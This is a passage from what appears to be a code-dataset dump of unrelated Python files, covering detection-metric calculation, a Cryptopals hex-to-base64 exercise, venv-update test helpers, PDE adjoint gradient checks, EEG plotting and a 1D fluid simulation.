open(os.path.join(savePath, 'results.txt'), 'w')\n f.write('Object Detection Metrics\\n')\n f.write('https://github.com/rafaelpadilla/Object-Detection-Metrics\\n\\n\\n')\n f.write('Average Precision (AP), Precision and Recall per class:')\n\n # each detection is a class\n for metricsPerClass in detections:\n\n # Get metric values per each class\n cl = metricsPerClass['class']\n ap = metricsPerClass['AP']\n precision = metricsPerClass['precision']\n recall = metricsPerClass['recall']\n totalPositives = metricsPerClass['total positives']\n total_TP = metricsPerClass['total TP']\n total_FP = metricsPerClass['total FP']\n\n if totalPositives > 0:\n validClasses = validClasses + 1\n acc_AP = acc_AP + ap\n prec = ['%.2f' % p for p in precision]\n rec = ['%.2f' % r for r in recall]\n ap_str = \"{0:.2f}%\".format(ap * 100)\n # ap_str = \"{0:.4f}%\".format(ap * 100)\n print('AP: %s (%s)' % (ap_str, cl))\n f.write('\\n\\nClass: %s' % cl)\n f.write('\\nAP: %s' % ap_str)\n f.write('\\nPrecision: %s' % prec)\n f.write('\\nRecall: %s' % rec)\n\n mAP = acc_AP / validClasses\n mAP_str = \"{0:.2f}%\".format(mAP * 100)\n print('mAP: %s' % mAP_str)\n f.write('\\n\\n\\nmAP: %s' % mAP_str)\n return mAP\n\nif __name__ == '__main__':\n\n iou_thresh = 0.75\n groundtruth_dir = '/home/robotics/FYP/Inferences/verb_right_20_scratch/200@45000/eval/gt_tmp'\n prediction_dir = '/home/robotics/FYP/Inferences/verb_right_20_scratch/200@45000/eval/prd_tmp'\n results_dir = '/home/robotics/FYP/Inferences/verb_right_20_scratch/200@45000/eval/mAP@'\n\n mAP = calculate(iou_thresh, groundtruth_dir, prediction_dir, results_dir)\n","sub_path":"ai_pipeline_main/webui/server/utils/map/calculate_map.py","file_name":"calculate_map.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"138954589","text":"#!/usr/bin/python\n\nimport urllib.parse\nimport urllib.request\n\nurl \t\t= 'http://start.csail.mit.edu/'\nvalues \t\t= {'query':'What is the capital of China?'}\n\ndata \t\t= urllib.parse.urlencode(values)\nbinary_data = data.encode('ascii')\nreq \t\t= urllib.request.Request(url, binary_data)\nresponse\t= urllib.request.urlopen(req)\nthe_page\t= response.read()\n\nprint (the_page)\n","sub_path":"pythonCodes/queryUrl.py","file_name":"queryUrl.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"480290569","text":"#!/usr/bin/env python3\nimport codecs\nfrom fn import *\n\n## Convert hex to base64\n\n# The string:\nhexed = 
b\"49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d\"\n\n# Should produce:\nbase64 = b\"SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t\\n\"\n# So go ahead and make that happen. You'll need to use this code for the rest of the exercises.\n\nunhexed = unhex(hexed)\nunbased = codecs.decode(base64, \"base64\")\n\nassert unhexed == unbased\n\nassert base64 == codecs.encode(unhexed, \"base64\")\nassert hexed == hex(unbased)\n\nprint(codecs.encode(unhexed, \"base64\"))\nprint(base64)\n","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"525439977","text":"import os\nimport numpy as np\nimport scipy.misc\nimport math\nfrom PIL import Image\nimport json\nimport pickle\nimport re\n\n# Visualising\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as plticker\nfrom shapely.geometry.polygon import Polygon\n\n\nclass Dataset:\n \"\"\"\n The 'Dataset' class provides an interface for working with a dataset consisting \n of images and annotations. \n\n An object of this class will provide the following functionality:\n\n Attributes:\n 1) The path to the dataset, images and annotations.\n 2) A sorted list of image file names\n 3) A sorted list of annotation/ building label file names\n 4) The length of the dataset.\n\n Methods:\n 1) Getting the size of each image in the dataset (assumed to be the same for all images)\n 2) Getting an image and its associated building labels given an index\n 3) Getting a batch of images and assoicated building labels given a start index and batch size\n 4) Removing a set of images and assoicated building labels given a set of indices.\n 5) Visualizing a single image in images_path with its assoicated building labels\n 6) Visualizing a sequence of tiles (images) in images_path with associated building labels, given\n a start and end index.\n 7) Visualizing the entire area with all bounding boxes (assuming such an image exists in the\n raw_data directory of the data_path)\n\n \"\"\"\n\n def __init__(self, data_path):\n \"\"\"\n Initializes a dataset object using the data in data_path. \n \"\"\"\n\n # The path to the entire data, the images and the annotations. Attributes 1)\n self.data_path = data_path\n self.images_path = f'{data_path}/images'\n self.annotations_path = f'{data_path}/annotations'\n \n # Attribute 2)\n self.img_list = sorted(os.listdir(self.images_path), key = self.sort_key)\n\n # Attritbute 3)\n self.annotation_list = sorted(os.listdir(self.annotations_path), key = self.sort_key)\n\n # Attribute 4)\n self.length = len(self.img_list)\n\n def sort_key(self, file_name):\n \"\"\"\n Helper method only.\n Finds the integer present in the string file_name. If an integer cannot be found,\n returns the file_name itself. 
Used as key function in sorting list of file names.\n \"\"\"\n d = re.search('[0-9]+', file_name)\n return int(file_name[d.start():d.end()]) if d else file_name\n\n def get_img_size(self):\n \"\"\"\n Method 1)\n Gets the size of the images in the dataset (assumed to be uniform)\n \"\"\"\n # Gets first image in dataset\n im = Image.open(f'{self.images_path}/{self.img_list[0]}')\n # Returns the shape of the image\n return np.array(im).shape\n \n def get_tile_and_label(self, index):\n \"\"\"\n Method 2)\n Gets the tile and label associated with data index.\n\n Returns:\n (tile_array, dictionary_of_buildings)\n \"\"\"\n\n # Open the jpeg image and save as numpy array\n im = Image.open(f'{self.images_path}/{self.img_list[index]}')\n im_arr = np.array(im)\n\n # Open the json file and parse into dictionary of index -> buildings pairs\n buildings_in_tile = {}\n with open(f'{self.annotations_path}/{self.annotation_list[index]}', 'r') as filename:\n try: \n buildings_in_tile = json.load(filename)\n except ValueError:\n buildings_in_tile = {}\n \n return (im_arr, buildings_in_tile)\n \n \n def get_batch(self, start_index, batch_size):\n \"\"\"\n Method 3)\n Gets batch of tiles and labels associated with data start_index.\n\n Returns:\n [(tile_array, list_of_buildings), ...]\n \"\"\"\n batch = []\n for i in range(start_index, start_index + batch_size):\n batch.append(self.get_tile_and_label(i))\n \n return batch\n\n def remove_tiles(self, indices_to_remove):\n \"\"\"\n Method 4)\n Removes the tiles associated with the indices in indices_to_remove, and renames all files\n in self.images_path and self.annotations.path (as appropriate)\n\n Requires: indices_to_remove is a set\n \"\"\"\n\n # file_index keeps track of the correct index for the images in the directory \n file_index = 0\n for i in range(self.length):\n\n # Check if index is to be removed\n if i in indices_to_remove:\n os.remove(f'{self.images_path}/img_{i}.jpg')\n os.remove(f'{self.annotations_path}/annotation_{i}.json')\n else:\n\n # If not to be removed, then check if index of file is in line with new file_index\n if i != file_index:\n os.rename(f'{self.images_path}/img_{i}.jpg', f'{self.images_path}/img_{file_index}.jpg')\n os.rename(f'{self.annotations_path}/annotation_{i}.json', \\\n f'{self.annotations_path}/annotation_{file_index}.json')\n \n file_index += 1\n\n # Update attributes 1)\n self.img_list = sorted(os.listdir(self.images_path), key = self.sort_key)\n self.annotation_list = sorted(os.listdir(self.annotations_path), key = self.sort_key)\n self.length = len(self.img_list)\n\n def visualize_tile(self, index):\n \"\"\"\n Method 5)\n Provides a visualization of the tile with the tile and its corresponding annotation/ label. 
\n        \"\"\"
\n \"\"\"\n im = Image.open(f'{self.images_path}/{self.img_list[index]}')\n im_arr = np.array(im)\n mng = plt.get_current_fig_manager()\n mng.window.showMaximized()\n plt.imshow(im_arr)\n\n # Open the json file and parse into dictionary of index -> buildings pairs\n buildings_in_tile = {}\n with open(f'{self.annotations_path}/{self.annotation_list[index]}', 'r') as filename:\n try: \n buildings_in_tile = json.load(filename)\n except ValueError:\n buildings_in_tile = {}\n\n for building_coords in buildings_in_tile.values():\n poly = Polygon(building_coords)\n x, y = poly.exterior.xy\n plt.plot(x, y)\n\n # TODO: Visualize bounding boxes from json format.\n\n plt.show()\n \n \n def visualize_tiles(self, start_idx, end_idx):\n \"\"\"\n Method 6)\n Provides a visualization of a sequence of tiles with associated annotations/labels\n between the start index and the end index (not including end index) of the tiles.\n \"\"\"\n for i in range(start_idx, end_idx):\n print(\"Tile index: \" + str(i))\n self.visualize_tile(i)\n \n\n def visualize_dataset(self):\n \"\"\"\n Method 7)\n Provides visualization of entire dataset image area, \n including annotations.\n\n This uses the data stored in the RAW_DATA_PATH.\n Requires:\n The entire image area with OSM data to be stored in a directory called raw_data.\n The OSM data should be in a pickle file, and the entire image area should be in \n a jpeg file.\n \"\"\"\n bboxes = []\n # Open pickle file with osm data\n with open(f\"{self.data_path}/raw_data/annotations.pkl\", \"rb\") as filename:\n bboxes = pickle.load(filename)\n\n im = Image.open(f\"{self.data_path}/raw_data/Entire_Area.jpg\")\n im_arr = np.array(im)\n\n plt.imshow(im_arr)\n for building_coords in bboxes:\n poly = Polygon(building_coords)\n x, y = poly.exterior.xy\n plt.plot(x, y)\n \n # # Add the grid\n # ax.grid(which='major', axis='both', linestyle='-')\n # ax.show()\n plt.grid()\n # plt.xticks(np.arange(0, 6000, 228), range(0, 23))\n # plt.yticks(np.arange(0, 6000, 228), range(0, 23))\n plt.show()\n","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218628313","text":"# NOTE WELL: No side-effects are allowed in __init__ files. 
This means you!\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom re import compile as Regex\nfrom re import MULTILINE\n\nfrom py._path.local import LocalPath as Path\n\nTOP = Path(__file__) / '../../..'\n\n\ndef requirements(reqs, path='requirements.txt'):\n \"\"\"Write a requirements.txt file to the current working directory.\"\"\"\n Path(path).write(reqs)\n\n\ndef run(*cmd, **env):\n if env:\n from os import environ\n tmp = env\n env = environ.copy()\n env.update(tmp)\n else:\n env = None\n\n from .capture_subprocess import capture_subprocess\n from venv_update import info, colorize\n info('\\nTEST> ' + colorize(cmd))\n out, err = capture_subprocess(cmd, env=env)\n err = strip_coverage_warnings(err)\n return out, err\n\n\ndef venv_update(*args, **env):\n # we get coverage for free via the (patched) pytest-cov plugin\n return run(\n 'venv-update',\n *args,\n **env\n )\n\n\ndef venv_update_symlink_pwd():\n # I wish I didn't need this =/\n # surely there's a better way -.-\n # NOTE: `pip install TOP` causes an infinite copyfiles loop, under tox >.<\n from venv_update import __file__ as venv_update_path, dotpy\n\n # symlink so that we get coverage, where possible\n venv_update_path = Path(dotpy(venv_update_path))\n local_vu = Path(venv_update_path.basename)\n if local_vu.exists():\n local_vu.remove()\n local_vu.mksymlinkto(venv_update_path)\n\n\ndef venv_update_script(pyscript, venv='venv'):\n \"\"\"Run a python script that imports venv_update\"\"\"\n\n # symlink so that we get coverage, where possible\n venv_update_symlink_pwd()\n\n # write it to a file so we get more-reasonable stack traces\n testscript = Path('testscript.py')\n testscript.write(pyscript)\n return run('%s/bin/python' % venv, testscript.strpath)\n\n\n# coverage.py adds some helpful warnings to stderr, with no way to quiet them.\ncoverage_warnings_regex = Regex(\n r'^Coverage.py warning: (%s)\\n' % '|'.join((\n r'Module .* was never imported\\.',\n r'No data was collected\\.',\n r'Module venv_update was previously imported, but not measured\\.',\n )),\n flags=MULTILINE,\n)\n\n\ndef strip_coverage_warnings(stderr):\n return coverage_warnings_regex.sub('', stderr)\n\n\ndef strip_pip_warnings(stderr):\n return stderr.replace(\n ''.join((\n 'DEPRECATION: Python 2.6 is no longer supported by the Python core team, please upgrade your Python. ',\n 'A future version of pip will drop support for Python 2.6\\n',\n )),\n '',\n )\n\n\ndef uncolor(text):\n # the colored_tty, uncolored_pipe tests cover this pretty well.\n from re import sub\n text = sub('\\033\\\\[[^A-z]*[A-z]', '', text)\n return sub('[^\\n\\r]*\\r', '', text)\n\n\ndef pip_freeze(venv='venv'):\n from os.path import join\n out, err = run(join(venv, 'bin', 'pip'), 'freeze', '--local')\n\n # Most python distributions which have argparse in the stdlib fail to\n # expose it to setuptools as an installed package (it seems all but ubuntu\n # do this). 
This results in argparse sometimes being installed locally,\n # sometimes not, even for a specific version of python.\n # We normalize by never looking at argparse =/\n import re\n out = re.sub(r'argparse==[\\d.]+\\n', '', out, count=1)\n\n assert err == ''\n return out\n\n\ndef enable_coverage(tmpdir, venv='venv', options=()):\n venv = tmpdir.join(venv)\n options += ('--', '-r', str(TOP.join('requirements.d/coverage.txt')))\n venv_update(str(venv), *options)\n\n return venv\n\n\nclass OtherPython(object):\n \"\"\"represents a python interpreter that doesn't match the \"current\" interpreter's version\"\"\"\n\n def __init__(self):\n import sys\n if sys.version_info[0] <= 2:\n self.interpreter = 'python3.4'\n self.version_prefix = '3.4.'\n else:\n self.interpreter = 'python2.7'\n self.version_prefix = '2.7.'\n","sub_path":"tests/testing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"18400877","text":"\"\"\"\nTest solutions of Elliptic PDE in the DILI paper by Cui et~al (2016)\nShiwei Lan @ U of Warwick, 2016\n\"\"\"\n\n\nfrom dolfin import *\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\nfrom Elliptic import Elliptic\n\n# parameters[\"num_threads\"] = 2\n\nnp.random.seed(2016)\n# settings\ndim=9\n# choice of coefficient definition\nkl_opt='fb'\n# kl_opt='kf'\n\n# generate observations\n# theta=.1*np.ones(dim)\ntheta=.1*np.random.randn(dim)\nelliptic=Elliptic(nx=30,ny=30)\n# K-L expansion with specific choice\ncoeff=elliptic.coefficient(theta=theta,kl_opt=kl_opt,degree=2)\n\n# solve forward equation\n# u_fwd,p_fwd,l_fwd=elliptic.soln_fwd(theta)\n\n# obtain observations\nobs,idx,loc,sd_noise=elliptic.get_obs(coeff)\n\n# parameters[\"plotting_backend\"]=\"matplotlib\"\n# plt.figure(0)\n# fig=plot(elliptic.states_fwd.split(True)[0])\n# plt.colorbar(fig)\n\n# define data misfit class\nprint('\\nDefining data-misfit...')\nmisfit=elliptic.data_misfit(obs,1./sd_noise**2,idx,loc)\n\n# ------------ early test ---------------------#\n# elliptic.set_forms(coeff)\n# u0,_=elliptic.soln_fwd()\n# u1,_=elliptic.states_fwd.split(True)\n# u2=u1.vector()\n#\n# print('Data-misfit: % .10f' % misfit.eval(u0))\n# print('Data-misfit: % .10f' % misfit.eval(u1))\n# print('Data-misfit: % .10f' % misfit.eval(u2))\n#\n# # test misfit as functional for adjoint\n# J_form = misfit.form(u0)\n# J_assemb = assemble(J_form)\n# print('Assembled data-misfit form: % .10f' % J_assemb)\n# J_func = misfit.func(u0)\n# J_value = sum([J_func(list(p)) for p in loc])\n# print('Evaluated data-misfit function: % .10f' % J_value)\n#\n# # solve adjoint equation\n# elliptic.set_forms(coeff,ord=[0,1])\n# u_adj,l_adj=elliptic.soln_adj(misfit)\n# elliptic.plot(backend='vtk')\n#\n# # obtain gradient of data-misfit\n# g = elliptic.get_grad(misfit)\n# print(g)\n#\n# # solve 2nd forward equation\n# u_actedon = np.random.randn(len(theta))\n# # u_fwd2,p_fwd2,l_fwd2=elliptic.soln_fwd2(u_actedon)\n#\n# # solve 2nd adjoint equation\n# # u_adj,p_adj2,l_adj2=elliptic.soln_adj2()\n#\n# # obtain metric action\n# Ma = elliptic.get_metact(u_actedon)\n# print (Ma)\n\n\n# ------------ adjoint method ---------------------#\n\n# obtain the geometric quantities\nprint('\\n\\nObtaining geometric quantities with Adjoint method...')\nstart = time.time()\nnll,dnll,Fv,FI = elliptic.get_geom(coeff,misfit,[0,1,1.5,2])\nif dnll is not None:\n print('gradient:')\n print(dnll)\nv = np.random.randn(coeff.l)\nif Fv is 
not None:\n Ma = Fv(v)\n print('metric action on a random vector:')\n print(Ma)\nif FI is not None:\n print('metric:')\n print(FI)\n# plot\n# elliptic.plot()\nend = time.time()\nprint('Time used is %.4f' % (end-start))\n\n# save solutions to file\n# elliptic.save()\n# plot solutions\n# elliptic.plot()\n\n# ------------ finite difference ---------------------#\n\n# check with finite difference\nprint('\\n\\nTesting against Finite Difference method...')\nstart = time.time()\nh = 1e-6\ntheta1 = theta.copy(True);\n\n## gradient\nprint('\\nFirst gradient:')\ndnll_fd = np.zeros_like(dnll)\nfor i in range(len(theta)):\n theta1[i]+=h; coeff.theta=theta1\n nll_p,_,_,_ = elliptic.get_geom(coeff,misfit)\n theta1[i]-=2*h; coeff.theta=theta1\n nll_m,_,_,_ = elliptic.get_geom(coeff,misfit)\n dnll_fd[i] = (nll_p-nll_m)/(2*h)\n theta1[i]+=h;\nprint('gradient:')\nprint(dnll_fd)\ndiff_grad = dnll_fd-dnll\nprint('Difference in gradient between adjoint and finite difference: %.10f (inf-norm) and %.10f (2-norm)' % (np.linalg.norm(diff_grad,np.inf),np.linalg.norm(diff_grad)))\n\n## metric-action\nprint('\\nThen Metric-action:')\nMa_fd = np.zeros_like(Ma)\n# obtain sensitivities\nfor n in range(len(idx)):\n misfit_n=elliptic.data_misfit(obs[n],1./sd_noise**2,idx[n],loc[None,n,])\n dudtheta=np.zeros_like(theta)\n for i in range(len(theta)):\n theta1[i]+=h; coeff.theta=theta1\n elliptic.set_forms(coeff)\n u_p,_ = elliptic.soln_fwd()\n u_p_vec = misfit_n.extr_sol_vec(u_p)\n theta1[i]-=2*h; coeff.theta=theta1\n elliptic.set_forms(coeff)\n u_m,_ = elliptic.soln_fwd()\n u_m_vec = misfit_n.extr_sol_vec(u_m)\n dudtheta[i]=(u_p_vec-u_m_vec)/(2*h)\n theta1[i]+=h;\n Ma_fd += dudtheta*(dudtheta.dot(v))\nMa_fd *= misfit.prec\nprint('metric action on a random vector:')\nprint(Ma_fd)\ndiff_Ma = Ma_fd-Ma\nprint('Difference in metric-action between adjoint and finite difference: %.10f (inf-norm) and %.10f (2-norm)' % (np.linalg.norm(diff_Ma,np.inf),np.linalg.norm(diff_Ma)))\nend = time.time()\nprint('Time used is %.4f' % (end-start))\n","sub_path":"RANS/dimension-reduced-geom-infmcmc/elliptic_dili/_Elliptic_KLcoeff/test_adjoint_fd.py","file_name":"test_adjoint_fd.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"536318411","text":"################################################################\n# PROYECTO - IE1014 - INTRODUCCION AL RECONOCIMIENTO PATRONES\n#\n################################################################\n###########\n# IMPORTS\n###########\n\nimport numpy as np\n#from numpy import genfromtxt\n#import sys\n#import os\nimport matplotlib.pyplot as plt\n#from scipy import signal\n\nfrom numpy.fft import fft, fftfreq, ifft\n\n########\n# MAIN\n########\ndef main():\n # sensores y etiquetas\n v1,v2,v3,v4,v5,v6,v7,v8,v9 = [],[],[],[],[],[],[],[],[]\n v10,v11,v12,v13,v14,label = [],[],[],[],[],[]\n # tiempo\n k = 0\n const = 117/14977\n time = []\n # archivo con los datos en el tiempo\n f = open(\"EEG-Eye-State.arff\", \"r\")\n\n lul = []\n # ignorar cosas del arff\n for x in range(19):\n f.readline()\n # se lee el archivo\n for line in f:\n lul.append(k)\n line = line.split(\",\")\n if(float(line[0])<6000 and float(line[1])<6000 and float(line[2])<6000\n and float(line[3])<6000 and float(line[4])<6000 and float(line[5])<6000\n and float(line[6])<6000 and float(line[7])<6000 and float(line[8])<6000\n and float(line[9])<6000 and float(line[10])<6000 and float(line[11])<6000\n and float(line[12])<6000 and 
float(line[13])<6000 and float(line[14])<6000):\n v1.append(float(line[0]))\n v2.append(float(line[1]))\n v3.append(float(line[2]))\n v4.append(float(line[3]))\n v5.append(float(line[4]))\n v6.append(float(line[5]))\n v7.append(float(line[6]))\n v8.append(float(line[7]))\n v9.append(float(line[8]))\n v10.append(float(line[9]))\n v11.append(float(line[10]))\n v12.append(float(line[11]))\n v13.append(float(line[12]))\n v14.append(float(line[13]))\n label.append(float(line[14])*1000+4000)\n time.append(k*const)\n k = k + 1\n f.close()\n\n\n plt.figure(2)\n plt.plot(time,label,time,v1,time,v2,time,v3,time,v4,time,v5,\n time,v6,time,v7,time,v8,time,v9,time,v10,\n time,v11,time,v12,time,v13,time,v14)\n\n plt.show()\n\n \"\"\"\n fourier = np.fft.fft(v3)\n freq = np.fft.fftfreq(14980)\n\n plt.figure(3)\n plt.plot(freq,fourier.real)\n\n plt.show()\n\n\n #t = np.linspace(0,117,14980)\n\n\n\n\n #signal = 1*np.cos(2*np.pi*0.1*t)\n\n #plt.plot(t,signal)\n #plt.plot(t,t)\n #plt.show()\n\n # FIN\n\n freqs = fftfreq(14980)\n\n mask = freqs > 0\n\n ola = v1\n\n print(ola)\n\n fft_vals = fft(ola)\n\n fft_theo = 2*np.abs(fft_vals/14980)\n\n plt.figure(1)\n plt.plot(freqs[mask], fft_theo[mask])\n plt.plot(freqs, fft_theo)\n plt.show()\n \"\"\"\n return 0\n\n#############\n# EJECUCION\n#############\nif __name__ == \"__main__\":\n main()\n","sub_path":"Proyecto/FFT.py","file_name":"FFT.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"51133138","text":"\r\nfrom matplotlib.pyplot import *\r\nfrom numpy import *\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.animation as animation\r\n\r\n# Mass fraction of each atomic species. We assume we know them\r\nX = 0.7\t\t\t\t# Proton\r\nY_3 = 10**(-10)\t\t# Helium-3\r\nY = 0.29\t\t\t# Helium-4\r\nZ = 0.01\t\t\t# Other metals\r\nZ_7Li = 10**(-13)\t# Lithium-7\r\nZ_7Be = 10**(-13)\t# Beryllium-7\r\nmu = 1/(2*X + Y_3 + 3*(Y-Y_3)/4.0 + 4*Z_7Li/7.0 + 5*Z_7Be/8.0)\t# Mean molecular weight\r\n\r\n# Solar constants\r\nrho_bar_sun = 1.408*10**(3)\t# Average solar density [kg/m^3]\r\n\r\n# Other constants\r\nk_B = 1.382*10**(-23)\t# Boltzmann constant [m^2kg/(s^2K)]\r\n\r\n# Particle/atom Masses\r\nm_u = 1.6605*10**(-27)\t# Atomic mass\r\n\r\n# Initial parameters\r\nrho_0 = 1.42*10**(-7)*rho_bar_sun\t# Initial density\r\nT_0 = 5770\t\t\t# Initial temperature. Units in Kelvin [K]\r\n\r\n# Constants for ideal gas\r\ngamma = 5.0/3.0\r\n\r\ndef P_gas(rho,T):\r\n\t\"\"\" Pressure from gas. 
Equation from ideal gas law \"\"\"\r\n\tP_G = (rho/(mu*m_u))*k_B*T\r\n\treturn P_G\r\n\r\ndef density(P,T):\r\n\t\"\"\" Function evaluating the density from ideal gas law \"\"\"\r\n\trho = (P*mu*m_u)/(k_B*T)\r\n\treturn rho\r\n\r\ndef c_s(T):\r\n\t\"\"\" Sound speed, ideal gas \"\"\"\r\n\tsound_speed = sqrt(gamma*(k_B*T)/(mu*m_u))\r\n\treturn sound_speed\r\n\r\nclass animate_and_solve:\r\n\tdef __init__(self, N, method):\r\n\t\tself.CHECK = 0\r\n\t\tself.N = N\r\n\t\tself.L = 1.5*10**6\r\n\t\tself.x = linspace(0, self.L, self.N)\r\n\t\tself.dx = self.L/self.N \t# Step length\r\n\t\tself.timeframe = 0 \t\t\t# Time frame for plotting purposes\r\n\r\n\t\t# Empty arrays\r\n\t\tself.P = zeros(self.N)\t\t# Array for pressure\r\n\t\tself.rho = zeros(self.N)\t# Array for density\r\n\t\tself.u_x = zeros(self.N)\t# Array for velocity\r\n\t\tself.T = zeros(self.N)\t\t# Array for temperature\r\n\t\tself.E = zeros(self.N)\t\t# Array Internal energy\r\n\r\n\t\t# Plots the variable we are interested in\r\n\t\tself.method = method\r\n\r\n\r\n\t\t## Small perturbation for testing purposes\r\n\t\t\"\"\"\r\n\t\tsigma = 2e9\r\n\t\tb = self.L/2.0\r\n\t\tf = P_gas(rho_0, T_0)*exp(-(self.x-b)**2/(2.0*sigma))\r\n\t\tself.P[:] = P_gas(rho_0, T_0) + f\r\n\t\tself.rho[:] = density(self.P[:], T_0)\r\n\t\tself.u_x[:] = c_s(T_0)\r\n\t\t\"\"\"\r\n\r\n\t\t# Initial conditions\r\n\t\tself.rho[0:50] = 1*rho_0\r\n\t\tself.rho[50:100] = 10*rho_0\r\n\t\tself.P[:] = P_gas(self.rho, T_0)\r\n\t\tself.T[:] = T_0\r\n\t\tself.E = self.P/(gamma-1.0)\r\n\t\t\r\n\r\n\tdef solve_equations(self):\r\n\t\t\"\"\" Solves the equations for one time step \"\"\"\r\n\t\t# Temporary arrays\r\n\t\trhon = zeros(self.N)\r\n\t\tPn = zeros(self.N)\r\n\t\tu_xn = zeros(self.N)\r\n\r\n\t\trhon = self.rho.copy()\r\n\t\tPn = self.P.copy()\r\n\t\tu_xn = self.u_x.copy()\r\n\t\t\r\n\t\t# Calculates continuity and momentum equations\r\n\t\trho_dt = -self.rho*self.c_dif(u_xn) - self.u_x*self.upwind(rhon)\r\n\t\trhou_dt = -self.rho*self.u_x*self.upwind(u_xn) - self.u_x*self.upwind(rhon*u_xn) - self.c_dif(Pn)\r\n\r\n\t\t# Calculate dt and new values\r\n\t\tself.dt = 0.1*(0.3*self.dx/c_s(T_0))\r\n\t\tself.rho = rhon + self.dt*rho_dt\r\n\t\tself.u_x = (rhon*u_xn + self.dt*rhou_dt)/(self.rho)\r\n\t\tself.P = k_B*T_0*self.rho/(mu*m_u)\t\r\n\r\n\tdef mass_check(self):\r\n\t\t\"\"\"\r\n\t\tA function used to plot the mass as a function of time\r\n\t\tChecks mass conservation\r\n\t\t\"\"\"\r\n\t\tNtime = 300\r\n\t\tt = zeros(Ntime)\r\n\t\tM = zeros(Ntime)\r\n\t\tM[0] = sum(self.rho)\r\n\r\n\t\tfor k in range(Ntime-1):\r\n\t\t\tself.solve_equations()\r\n\t\t\tt[k+1] = t[k]+self.dt\r\n\t\t\tM[k+1] = sum(self.rho)\r\n\r\n\t\tplot(t, M)\r\n\t\txlabel('t - [s]')\r\n\t\tylabel('M - [kg/m$^3$]')\r\n\t\ttitle('Plot of mass as a function of time')\r\n\t\tshow()\r\n\r\n\tdef c_dif(self, A):\r\n\t\t\"\"\"\r\n\t\t# First order central difference\r\n\t\t# Includes boundary conditions\r\n\t\t\"\"\"\r\n\t\tB = zeros(self.N)\r\n\t\tB[0] = A[1] - A[-1]\r\n\t\tB[1:-1] = A[2:] - A[:-2]\r\n\t\tB[-1] = A[0] - A[-2]\r\n\t\treturn B/(2.0*self.dx)\r\n\r\n\tdef upwind(self, A):\r\n\t\t\"\"\"\r\n\t\tFirst order upwind scheme\r\n\t\tAlso includes periodic boundary conditions\r\n\t\t\"\"\"\r\n\t\ta_plus = self.u_x[:] > 0\r\n\t\ta_min = self.u_x[:] <= 0\r\n\t\tB = zeros(self.N)\r\n\t\tB[1:-1] = (a_plus[1:-1]*(A[1:-1] - A[:-2]) + a_min[1:-1]*(A[2:] - A[1:-1]))\r\n\t\tB[0] = a_plus[0]*(A[1] - A[-1]) + a_min[0]*(A[1] - A[-1])\r\n\t\tB[-1] = a_min[-1]*(A[0] - A[-2]) + a_plus[-1]*(A[0] - 
A[-2])\r\n\t\treturn B/self.dx\r\n\r\n\tdef plot_animation(self):\r\n\t\t\"\"\" Animates the time evolution of the selected variable \"\"\"\r\n\t\tfig, ax = subplots()\r\n\t\t\r\n\t\tif self.method == 'P':\r\n\t\t\t\"\"\" Animates pressure as a function of position \"\"\"\r\n\r\n\t\t\tself.time_text = ax.text(0.01,max(self.P)*1.03,'')\r\n\t\t\tax.set_ylim([min(self.P)*0.8, max(self.P)*1.1])\r\n\t\t\tself.varfunc = lambda: self.P\r\n\t\t\tself.line, = ax.plot(self.x/10.0**6, self.P)\r\n\t\t\txlabel('x - [Mm]')\r\n\t\t\tylabel('P - [Pa]')\r\n\t\t\ttitle('Plot of pressure $P$, N = %d' %self.N)\r\n\r\n\t\telif self.method == 'u':\r\n\t\t\t\"\"\" Animates velocity as a function of position\"\"\"\r\n\r\n\t\t\tself.time_text = ax.text(0.01, max(self.u_x)*0.3,'')\r\n\t\t\tax.set_ylim([min(self.u_x)*0.0, max(self.u_x)*5])\r\n\t\t\tself.varfunc = lambda: self.u_x\r\n\t\t\ttitle('Plot of velocity $u_x$, N = %d' %self.N)\r\n\t\t\tself.line, = ax.plot(self.x/10.0**6, self.u_x)\r\n\t\t\txlabel('x - [Mm]')\r\n\t\t\tylabel(r'$u_x$ - [m/s]')\r\n\r\n\t\telif self.method == 'rho':\r\n\t\t\t\"\"\" Animates density as a function of position \"\"\"\r\n\r\n\t\t\tself.time_text = ax.text(0.01,max(self.rho)*1.03,'')\r\n\t\t\tax.set_ylim([min(self.rho)*0.8, max(self.rho)*1.1])\r\n\t\t\tself.varfunc = lambda: self.rho\r\n\t\t\ttitle(r'Plot of density $\\rho$, N = %d' %self.N)\r\n\t\t\tself.line, = ax.plot(self.x/10.0**6, self.rho)\r\n\t\t\txlabel('x - [Mm]')\r\n\t\t\tylabel(r'$\\rho$ - [kg/m$^3$]')\r\n\r\n\t\telse:\r\n\t\t\traise ValueError('Method not typed in correctly. Try: u, P or rho')\r\n\r\n\t\tdef init():\r\n\t\t\tself.time_text.set_text('')\r\n\r\n\t\t\treturn self.line, self.time_text,\r\n\r\n\t\tani = animation.FuncAnimation(fig, self.update, init_func=init, frames=1\t, interval=50, blit=True)\r\n\r\n\t\t# Saving animation as a file. 
